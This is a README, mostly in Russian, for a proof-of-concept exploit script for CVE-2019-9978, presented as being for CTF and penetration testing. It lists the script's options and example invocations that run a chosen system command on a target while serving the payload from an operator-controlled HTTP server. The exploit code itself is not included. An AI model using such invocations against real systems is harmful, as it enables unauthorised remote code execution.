
cve-2019-9978 PoC
Это скрипт, позволяющий эксплуатировать уязвимость CVE-2019-9978 простым способом, предназначенный для использования в соревнованиях Capture The Flag (CTF) или в качестве доказательства концепции для тестирования на проникновение.
pip install requests) ./cve-2019-9978.py -u http://target.com:9999 -c "your_system_command" -l your_ip:your_port
- `-u` or `--url`: Set the target URL to deliver the payload.
- `-c` or `--command`: Set the system command to run on the target system.
- `-l` or `--local`: Set the IP and port for the HTTP server (optional).
./cve-2019-9978.py -u http://target.com:9999 -c "id" -l 10.10.13.15:12345
Этот код предназначен только для образовательных и тестовых целей. Несанкционированное использование в системах без надлежащего разрешения незаконно и неэтично. Используйте его ответственно.